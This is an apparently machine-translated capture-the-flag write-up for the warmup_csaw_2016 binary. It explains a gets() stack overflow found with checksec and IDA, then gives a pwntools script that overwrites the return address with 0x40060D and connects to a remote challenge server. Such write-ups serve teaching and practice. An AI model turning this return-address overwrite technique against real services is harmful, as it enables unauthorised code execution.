One 、 see file

First file ./warmup_csaw_2016 Check the file type and then checksec --file=warmup_csaw_2016 Check the file protection .

Two 、 Drag in IDA pro Decompile in

use IDA Pro 64bit open warmup_csaw_2016 Post press F5 Disassemble the source code and check the main function , Find out gets() Function reads input to variable v5 in , v5 The length of is only 0x40, The stack size is only 64 byte , however gets() Function does not restrict input , Obviously, there is a stack overflow vulnerability .

stay Functions window You can see there's one sub_40060D() function , Press F5 Disassembly shows that this is a system call , And sub_40060D() The starting address of the function is 0x40060D.

3、 ... and 、 Write code

from pwn import *
# remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 26694)
payload = b'a'*(0x40 + 0x8) + p64(0x40060D)
io.sendline(payload) # send data 
io.interactive() # And shell Interact 

summary

Did a few introductory questions , From the original weak ants to now slightly strong ants , I decided to implement the vegetable dog plan , Let ants continue to evolve .
The idea in the title is very clear , For stack overflow , We first determine whether there is a stack overflow vulnerability , Then find the function called by the system , Then find out his address , Finally, our code is built .
Calculation of offset =（ The size of the array itself + Offset of corresponding bit 64 Is it ox8 ）
Then add the address of our system call function .